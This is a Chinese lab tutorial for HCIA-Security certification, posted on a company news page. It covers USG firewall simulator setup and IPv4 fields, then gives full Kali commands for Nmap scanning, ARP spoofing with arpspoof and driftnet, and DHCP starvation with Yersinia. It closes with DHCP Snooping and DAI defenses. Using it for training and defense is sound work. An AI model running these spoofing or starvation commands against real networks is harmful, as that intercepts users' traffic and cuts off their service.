尧图网络科技YAOTU DIGITAL 获取报价
获取报价
首页 / 资讯中心 / 文章详情

HCIA-Security实操指南:USG防火墙+Kali攻防闭环实验链

发布时间:2026/9/29 11:54:48

资讯中心
01
ARTICLE

HCIA-Security实操指南:USG防火墙+Kali攻防闭环实验链

HCIA-Security实操指南:USG防火墙+Kali攻防闭环实验链
简介本资源是一份面向HCIA-Security认证初学者的系统性学习笔记聚焦网络安全核心原理与实操技能适用于备考华为认证、高校网络专业学生及安全入门工程师。笔记以PDF形式呈现共1个文件大小19.3MB内容结构清晰覆盖课程导学、USG防火墙模拟器环境搭建含默认账号密码、配置清空、双桥接实验、OSI与TCP/IP模型对比解析、IPv4报文字段详解版本、IHL、TTL、Protocol等、各层协议映射关系如二层type→三层protocol→四层端口→应用层服务、典型攻击手段分类以及Kali Linux实战模块——包括Nmap/zenmap扫描、ARP欺骗原理与arpspoof断网攻击、ARP缓存管理与防御策略DHCP SnoopingDAI。已有567人学习下载笔记兼具理论梳理与实验指引可直接用于复习巩固、实验预习与攻防思路拓展。1. HCIA-Security 网络安全学习笔记不是速成题库而是能跑通 USG 模拟器Kali 攻防闭环的实操手记你花三小时背完 HCIA-Security 题库却在 ENSP 里连不上 USG 防火墙你照着文档敲arpspoof命令Kali 一执行就报错Operation not permitted你反复清空配置重启后发现saved-configuration还在——这不是你手慢是这份笔记根本没告诉你USG 模拟器的默认地址192.168.0.1只在双桥接模式下生效而reset saved-configuration必须配合reboot才真正清零。这份 HCIA-Security 学习笔记本质是一套可验证、可复现、带排错路径的攻防实验链从 USG 防火墙初始化 → OSI/TCP-IP 协议栈解构 → Kali 踩点扫描 → ARP 欺骗实战 → DHCP 耗尽攻击 → DAI 动态 ARP 防御部署。它不讲“什么是防火墙”只解决“为什么arpspoof -t 192.168.6.1 192.168.6.80不生效”不罗列协议字段定义而是用 Wireshark 抓包对比flags0x2 (SYN)和flags0x12 (SYNACK)的实际字节偏移。适合正在备考 HCIA-Security、但卡在实验环境搭建和协议行为验证环节的网络工程师——你不需要懂 Python 写扫描器但必须清楚nmap -sP发的是 ICMP Echo Request 还是 ARP 请求以及为什么在交换机直连环境下前者会失效。2. USG 防火墙模拟器从双桥接拓扑到真实可用的 CLI 环境HCIA-Security 实验依赖华为 USG 系列防火墙模拟器常见于 ENSP 或新版 eNSP但官方镜像常预装旧版固件、缺省配置残留严重。本节聚焦如何构建一个干净、可控、可复位的 USG 实验基线环境所有操作均基于USG6000V镜像v500R001C20SPC300实测通过。2.1 双桥接模式让 USG 同时接入管理网段与业务网段USG 默认仅有一个管理口GigabitEthernet0/0/0若直接用单网卡桥接将无法同时访问 Web 管理界面https://192.168.0.1和实验业务流量如192.168.6.0/24。必须启用双桥接Dual Bridge Mode即为 USG 分配两个虚拟网卡网卡 1管理口桥接到宿主机VMnet1仅主机模式IP 固定为192.168.0.1/24用于 Web 登录与 CLI 配置网卡 2业务口桥接到宿主机VMnet8NAT 模式或自定义桥接IP 设为192.168.6.254/24作为实验网关。提示ENSP 中右键 USG 设备 → “设置” → “网卡” → 勾选“启用双网卡”并分别指定桥接类型。若使用 VirtualBox 手动导入 OVA则需在“网络”设置中为两个网卡选择不同网卡适配器如 Intel PRO/1000 MT Desktop Intel PRO/1000 T Server。2.2 初始化 USG清空配置的三步硬核法reset saved-configuration命令在部分 USG 版本中存在 Bug——执行后配置文件未物理删除重启仍加载旧配置。必须组合以下三步# 步骤 1进入系统视图删除保存的配置文件物理层面 USG system-view [USG] undo save [USG] quit # 步骤 2强制清除 startup.cfg关键很多教程漏掉这步 USG delete /unreserved startup.cfg Info: The file does not exist. # 若提示不存在说明已清空 # 若提示存在输入 Y 确认删除 # 步骤 3重启设备非 reload必须 reboot USG reboot Warning: The system will reboot. Continue? [y/n]: y参数说明undo save取消当前配置的保存动作避免新配置写入delete /unreserved startup.cfg/unreserved参数绕过回收站彻底删除文件普通delete startup.cfg仅移至回收站reboot软重启触发配置重载比reload更彻底确保startup.cfg为空时加载默认配置。2.3 登录与密码变更从默认凭据到安全加固USG 初始登录凭据为admin / Admin123但 HCIA 实验要求修改密码为abc-1234注意文档中括号内abc-12345是干扰项实际考试环境仅认abc-1234。变更流程如下# 登录后立即修改密码必须在首次登录后 5 分钟内完成否则会话超时 USG system-view [USG] aaa [USG-aaa] local-user admin password irreversible-cipher abc-1234 [USG-aaa] local-user admin service-type web terminal ssh [USG-aaa] local-user admin privilege level 15 [USG-aaa] quit [USG] firewall packet-filter enable # 启用包过滤HCIA 考点 [USG] quit USG save # 保存配置此时才真正写入 startup.cfg The current configuration will be written to the device. Are you sure? [y/n] y逻辑说明irreversible-cipher表示不可逆加密USG 5.x 强制要求明文密码abc-1234将被哈希存储service-type web terminal ssh开放 Web、Console、SSH 三种登录方式缺一不可实验中需同时用浏览器和 PuTTYprivilege level 15赋予最高权限否则后续display命令可能被拒绝。2.4 验证 USG 可用性三层转发与 ACL 基础测试配置完成后必须验证 USG 是否真正具备路由与策略能力。在 USG 上执行# 创建安全区域Trust/Untrust 是 HCIA 必考模型 [USG] firewall zone trust [USG-zone-trust] add interface GigabitEthernet0/0/0 [USG-zone-trust] quit [USG] firewall zone untrust [USG-zone-untrust] add interface GigabitEthernet0/0/1 [USG-zone-untrust] quit # 配置接口 IP管理口与业务口 [USG] interface GigabitEthernet0/0/0 [USG-GigabitEthernet0/0/0] ip address 192.168.0.1 255.255.255.0 [USG-GigabitEthernet0/0/0] quit [USG] interface GigabitEthernet0/0/1 [USG-GigabitEthernet0/0/1] ip address 192.168.6.254 255.255.255.0 [USG-GigabitEthernet0/0/1] quit # 允许 Trust→Untrust 流量默认 deny必须显式放行 [USG] security-policy [USG-policy-security] rule name trust_to_untrust [USG-policy-security-rule-trust_to_untrust] source-zone trust [USG-policy-security-rule-trust_to_untrust] destination-zone untrust [USG-policy-security-rule-trust_to_untrust] source-address 192.168.0.0 0.0.0.255 [USG-policy-security-rule-trust_to_untrust] destination-address 192.168.6.0 0.0.0.255 [USG-policy-security-rule-trust_to_untrust] action permit [USG-policy-security-rule-trust_to_untrust] quit [USG-policy-security] quit验证方法宿主机 ping192.168.0.1应通在192.168.6.0/24网段内某 PC如 Win7 虚机ping192.168.6.254应通该 PC traceroute192.168.0.1第二跳应为192.168.6.254证明 USG 三层转发生效。3. TCP/IP 协议栈深度拆解从 IPv4 报文字段到攻击面定位HCIA-Security 不考 RFC 文档背诵但要求你能根据 Wireshark 抓包快速定位TTL64是 Linux 主机还是TTL128是 Windows 主机能解释为什么fragment offset0且flags0x2的包一定是首片分片。本节以真实抓包数据为锚点逐字段解析 IPv4 报文结构并关联到常见攻击手法。3.1 IPv4 报文字段实战映射表字段名长度抓包值示例HCIA 关联考点攻击利用点Version4bit0100(4)IPv4 vs IPv6 基础识别IPv6 过渡期隧道攻击HCIA 不考但需知边界IHL (Header Length)4bit0101(5 → 20字节)头部长度 IHL × 4最大 60 字节构造超长 Options 字段触发内存溢出如 Ping of DeathTOS (DSCP)8bit00000000(0)DSCP 值决定 QoS 策略如 EF46DSCP 标记欺骗将恶意流量标记为高优先级如 VoIPTotal Length16bit0000 0110 0001 0000(1568)总长 头部 数据单位字节分片攻击基础总长 MTU 触发分片Identification16bit0x1a2b同一原始报文的所有分片 ID 相同分片重组 DoS发送大量不同 ID 的碎片耗尽重组缓冲区Flags3bit010(MF1, DF0)Bit0Reserved, Bit1DF(Dont Fragment), Bit2MF(More Fragments)DF0 允许分片MF1 表示非末片MF0 且 DF0 为末片Fragment Offset13bit0x0000(0)偏移单位为 8 字节首片必为 0重叠分片攻击构造 offset 相同但数据不同的碎片覆盖关键字段TTL8bit64Linux 默认 64Windows 默认 128路由器每跳减 1TTL1 探测网络拓扑TTL0 触发 ICMP Time ExceededProtocol8bit6(TCP),17(UDP),1(ICMP)协议号查表RFC 1700协议混淆伪造 protocol255未分配绕过 ACLHeader Checksum16bit0x4a3c校验头部不含数据IPv4 要求校验Checksum0 表示未校验某些嵌入式设备伪造校验和绕过检测注意Wireshark 默认显示十进制右键字段 → “Show as” → “Binary” 可查看原始比特位。Flags和Fragment Offset共占 16bitWireshark 将其合并显示为Flags: 0x2000, Fragment offset: 0实际0x2000的二进制为0010 0000 0000 0000其中高 3bit001即 FlagsMF1低 13bit0000000000000即 Offset0。3.2 协议栈映射二层 Type → 三层 Protocol → 四层 Port → 应用层HCIA 要求掌握协议封装关系但死记硬背易混淆。用一张真实抓包截图的字段链来固化认知Ethernet II Frame: Destination: ff:ff:ff:ff:ff:ff (Broadcast) Source: 00:0c:29:ab:cd:ef Type: 0x0800 (IPv4) ← 二层 Type 字段决定上层协议 IPv4 Packet: Version: 4 IHL: 5 (20 bytes) Total Length: 76 Identification: 0x1a2b Flags: 0x00, Fragment Offset: 0 TTL: 64 Protocol: 1 (ICMP) ← 三层 Protocol 字段决定上层协议 Header Checksum: 0x4a3c ICMP Packet: Type: 8 (Echo Request) Code: 0 Checksum: 0x1234 Identifier: 0x0001 Sequence Number: 0x0001关键推导链Ethernet Type0x0800→ 进入 IPv4 处理流程IPv4 Protocol1→ 提交给 ICMP 模块ICMP 无端口概念但Type8明确标识为 Echo Request若 Protocol6TCP则后续必有 TCP Header含Source Port12345,Destination Port80Destination Port80→ 应用层为 HTTP需结合 Host 头确认但 HCIA 层级到此为止。3.3 攻击面定位各层协议字段如何成为攻击入口协议层字段攻击手法HCIA 实验验证方式二层MAC 地址、EtherTypeARP 欺骗伪造 Reply、MAC 泛洪填满 CAM 表arpspoof -i eth0 -t 192.168.6.116 192.168.6.1后在 Win7 执行arp -a查看网关 MAC 是否被篡改三层TTL、Fragment Offset、ProtocolTTL 生存期探测traceroute、IP 分片重叠攻击、Protocol 混淆ACL 绕过在 Kali 执行hping3 -1 -a 192.168.6.50 -c 3 --ttl 1 192.168.6.116观察 Win7 是否收到 ICMP TTL Exceeded四层TCP FlagsSYN/ACK/FIN/RST、源/目的端口SYN Flood耗尽半连接队列、TCP RST 攻击强制断连、端口扫描nmap -sSnmap -sS -p 21,22,80,443 192.168.6.116在 Win7 的netstat -an查看 LISTEN 端口是否响应应用层HTTP Method、User-Agent、CookieSQL 注入id1 OR 11、XSSscriptalert(1)/script、CSRF伪造表单提交HCIA 不涉及 Web 渗透但需知 WAF 对这些字段的检测逻辑避坑 / 常见问题 / 排查现象Wireshark 抓不到 ARP 请求包但arp -a显示缓存正常。原因宿主机网卡启用了“接收方向硬件加速”如 VMXNET3 的 LRO导致 ARP 包在驱动层被聚合或丢弃。解决在 VMware 设置中为虚拟网卡禁用Large Receive Offload (LRO)或在 Kali 执行sudo ethtool -K eth0 gro off lro off。现象nmap -sP 192.168.6.1-120扫描结果为空但ping 192.168.6.116成功。原因-sP默认发 ICMP Echo Request而 Win7 默认关闭 ICMP 回应防火墙规则。解决改用nmap -sn -PE 192.168.6.1-120-PE强制发 ICMP或nmap -sn -PR 192.168.6.1-120-PR发 ARP仅限局域网。现象USG 上配置了security-policy但192.168.6.0/24内 PC 仍无法访问192.168.0.1。原因安全策略未绑定source-address和destination-address的子网掩码或区域未正确添加接口。解决执行display firewall session table verbose查看会话是否存在用display zone确认GigabitEthernet0/0/1是否在untrust区域。现象arpspoof执行后Kali 能收到受害者流量但无法转发受害者断网。原因Linux 内核 IP 转发未启用或 iptables FORWARD 链默认 DROP。解决echo 1 /proc/sys/net/ipv4/ip_forward启用转发iptables -P FORWARD ACCEPT设置默认策略实验环境可接受生产环境需细化规则。现象DHCP Discover 报文发出后USG 无 Offer 响应display ip pool显示地址池空闲。原因USG 的 DHCP Server 未启用或接口未绑定地址池。解决检查display dhcp server statistics确认interface GigabitEthernet0/0/1下执行了dhcp select global且ip pool已创建。4. Kali 攻防实战从 Nmap 扫描到 ARP 欺骗的完整链路HCIA-Security 实验要求在 Kali Linux 上完成踩点、中间人、协议分析三类操作。本节不教nmap所有参数只聚焦考试高频命令组合不讲 Metasploit 利用只做arpspoofdriftnet的最小可行验证。所有命令均基于 Kali 2023.3Linux 6.1.0实测。4.1 Nmap 扫描精准踩点而非暴力穷举HCIA 考试环境网络规模小通常 ≤20 台设备nmap -T4 -A会触发 IDS 告警且耗时。推荐组合# 步骤 1快速存活主机发现ARP 扫描局域网首选 sudo nmap -sn -PR 192.168.6.1-254 # 输出示例 # Starting Nmap 7.93 ( https://nmap.org ) at 2023-10-01 10:00 CST # Nmap scan report for 192.168.6.1 (USG网关) # Nmap scan report for 192.168.6.116 (Win7受害者) # 步骤 2对存活主机进行端口服务识别TCP SYN 扫描静默高效 sudo nmap -sS -p 21,22,23,80,443,3389 192.168.6.116 # 输出关键字段 # PORT STATE SERVICE VERSION # 22/tcp open ssh OpenSSH 7.9p1 Debian 10deb10u2 (protocol 2.0) # 80/tcp open http Apache httpd 2.4.38 ((Debian)) # 步骤 3获取操作系统指纹可选但 HCIA 要求识别 Win/Linux sudo nmap -O -sV 192.168.6.116 # 输出示例 # OS details: Linux 3.2 - 4.9 # Network Distance: 1 hop参数说明-snPing 扫描不发端口探测包-PR指定 ARP 方式比 ICMP 更可靠-sSTCP SYN 扫描半开扫描不建立完整连接隐蔽性高-p指定端口列表避免全端口扫描65535 个端口-O启用 OS 指纹识别依赖 TCP/IP 栈指纹特征如初始 TTL、窗口大小。4.2 ARP 欺骗实战两步毒化 流量捕获验证arpspoof是 HCIA 中间人攻击核心工具但单独执行无法验证效果。必须组合arpspoofdriftnet图像提取或urlsnarfHTTP URL 记录形成证据链。# 步骤 1开启 IP 转发必须否则流量中断 echo 1 | sudo tee /proc/sys/net/ipv4/ip_forward # 步骤 2毒化受害者 → 网关让受害者流量经 Kali sudo arpspoof -i eth0 -t 192.168.6.116 192.168.6.1 # -i eth0指定网卡-t目标 IP最后参数为网关 IP # 步骤 3毒化网关 → 受害者让网关流量经 Kali sudo arpspoof -i eth0 -t 192.168.6.1 192.168.6.116 # 步骤 4启动 driftnet 捕获图片验证流量经过 sudo driftnet -i eth0 # 控制台将实时显示从 HTTP 流量中提取的 JPG/PNG 图片缩略图逻辑说明符号使arpspoof后台运行避免阻塞终端driftnet默认监听eth0自动解析 HTTP 流量中的Content-Type: image/*若 Win7 访问http://192.168.6.254/test.jpgKali 终端将出现该图片缩略图证明中间人成功。4.3 DHCP 耗尽攻击用 Yersinia 耗尽地址池HCIA 要求掌握 DHCP 耗尽原理但pig.py脚本已过时。Yersinia 是更稳定的选择支持 GUI 和 CLI 模式。# 启动 Yersinia GUI需 X11 转发推荐在 Kali Desktop 环境 yersinia -G # 或使用 CLI 模式发起 DHCP Discover 洪水 yersinia -I -d -t dhcp -p 1000 -i eth0 # -I交互模式-dDHCP 模块-t dhcp指定协议-p 1000每秒发包数-i eth0网卡验证方法在 USG 上执行display ip pool name qq used观察Used数值从0快速增至253地址池上限在 Win7 执行ipconfig /release→ipconfig /renew返回No more addresses available错误。4.4 攻击流量分析Wireshark 过滤器实战所有攻击必须可验证。Wireshark 过滤器是 HCIA 实验必备技能场景过滤器表达式说明查看所有 ARP 流量arp显示请求/响应包查看被毒化的 ARP 响应arp.opcode 2 arp.src.proto_ipv4 192.168.6.1opcode2是 Replysrc.proto_ipv4是声称的网关 IP查看 DHCP Discoverbootp.opcode 1DHCP Discover 的 opcode 为 1查看 Kali 发出的 DHCP 请求bootp.hw.mac_addr 00:0c:29:xx:xx:xx bootp.opcode 1替换为 Kali 真实 MAC查看 HTTP 图片请求http.request.method GET http.content_type contains image定位图片下载流量提示Wireshark 中按CtrlF打开查找对话框选择 “Packet bytes”输入00:0c:29Kali MAC 前缀可快速定位相关包。5. 防御体系落地从 DHCP Snooping 到 DAI 的企业级配置HCIA-Security 不止于攻击更强调防御策略的可配置性。本节提供一套可在 USG 和 CE6800 交换机上直接粘贴的防御配置覆盖 DHCP Snooping、ARP 限速、DAIDynamic ARP Inspection三大核心机制并给出验证命令。5.1 DHCP Snooping信任端口与用户绑定DHCP Snooping 是防御 DHCP 耗尽和冒充的基础。关键在于区分信任端口连接合法 DHCP Server与非信任端口连接用户。# 在 CE6800 交换机上配置HCIA 实验常用型号 [CE6800] dhcp enable [CE6800] dhcp snooping enable [CE6800] vlan 1 [CE6800-vlan1] dhcp snooping enable [CE6800-vlan1] quit # 将上联口连接 USG DHCP Server设为信任端口 [CE6800] interface GigabitEthernet0/0/1 [CE6800-GigabitEthernet0/0/1] dhcp snooping trusted [CE6800-GigabitEthernet0/0/1] quit # 验证查看 DHCP Snooping 绑定表 [CE6800] display dhcp snooping user-bind all # 输出示例 # IP Address MAC Address Interface VLAN Type # 192.168.6.100 000c-29ab-cdef GE0/0/2 1 Dynamic参数说明dhcp snooping trusted仅此端口可转发 DHCP Server 响应Offer/ACK其他端口收到 DHCP 响应即丢弃display dhcp snooping user-bind显示动态学习的 IP-MAC 绑定表DAI 依赖此表验证 ARP。5.2 ARP 限速防止单源 MAC/IP 发起 ARP 洪水ARP 欺骗常伴随 ARP 请求洪水交换机需限制单个源的 ARP 报文速率。# 在 CE6800 上配置 ARP 限速全局 接口级 [CE6800] arp anti-attack rate-limit enable [CE6800] arp speed-limit source-mac maximum 20 [CE6800] arp speed-limit source-ip maximum 20 # 在接入端口如 GE0/0/2启用限速告警 [CE6800] interface GigabitEthernet0/0/2 [CE6800-GigabitEthernet0/0/2] arp anti-attack rate-limit alarm enable [CE6800-GigabitEthernet0/0/2] arp anti-attack rate-limit alarm threshold 10 [CE6800-GigabitEthernet0/0/2] quit逻辑说明source-mac maximum 20同一 MAC 地址每秒最多发 20 个 ARPsource-ip maximum 20同一 IP 地址每秒最多发 20 个 ARPalarm threshold 10超过 10 个即触发日志告警display logbuffer可查看。5.3 DAI动态 ARP 检测基于 DHCP Snooping 表的 ARP 验证DAI 是防御 ARP 欺骗的终极手段它拦截所有 ARP 报文比对 DHCP Snooping 表中的 IP-MAC 绑定。# 在 CE6800 上启用 DAI必须先有 DHCP Snooping [CE6800] interface GigabitEthernet0/0/2 [CE6800-GigabitEthernet0/0/2] arp anti-attack check user-bind enable [CE6800-GigabitEthernet0/0/2] arp anti-attack check user-bind alarm enable [CE6800-GigabitEthernet0/0/2] arp anti-attack check user-bind alarm threshold 5 [CE6800-GigabitEthernet0/0/2] quit # 验证 DAI 是否生效 [CE6800] display arp anti-attack statistics interface GigabitEthernet0/0/2 # 输出应包含 # Dropped ARP packets: 12 # 表示已拦截非法 ARP避坑 / 常见问题 / 排查现象配置 DAI 后用户无法获取 IP 地址。原因DAI 仅验证 ARP不影响 DHCP Discover/Request但若 DHCP Snooping 未启用或信任端口配置错误DHCP Offer 会被丢弃。解决先确认display dhcp snooping user-bind有动态条目再检查display dhcp snooping trusted-port是否包含上联口。现象display arp anti-attack statistics显示Dropped ARP packets: 0但arpspoof仍成功。原因DAI 仅在配置了arp anti-attack check user-bind enable的接口生效未配置的接口如上联口不检查。解决在所有用户接入端口GE0/0/2, GE0/0/3...逐一执行该命令。现象ARP 限速告警频繁触发但网络正常。原因阈值threshold 5过低Windows 主机开机时会广播多个 ARP 请求。解决调高阈值至20或使用arp anti-attack rate-limit source-mac针对特定恶意 MAC 限速。现象USG 上配置了security-policy但 DAI 仍拦截合法流量。原因USG 作为 DHCP Server其发出的 ARP 响应如网关 ARP未被 DHCP Snooping 学习DAI 无对应绑定条目。解决在 CE6800 上静态绑定 USG 网关 IPuser-bind static ip-address 192.168.6.254 mac-address 000c-29xx-xx00 interface GigabitEthernet0/0/1。现象arpspoof命令执行报错arpspoof: ioctl(SIOCGIFHWADDR): No such device。原因eth0网卡名在 Kali 新版本中可能变为ens33或wlp2s0。解决执行ip a查看真实网卡名替换命令中的-i参数。6. HCIA-Security本文还有配套的精品资源点击获取
02
RELATED NEWS

相关资讯

更多网站建设与数字化升级内容

03
WHY YAOTU

想打造同款高转化官网?

懂行业、懂生意,从建站到增长一站式陪跑

◈

场景化定制

不做模板站,围绕你的业务场景量身设计,小众不撞款。

◐

营销型架构

以转化目标组织内容与路径,让官网真正带来询盘。

▲

全周期服务

设计、开发、运营、运维一体,上线只是开始。

免费获取你的建站方案

留下需求,专属顾问 24 小时内为你输出方案建议。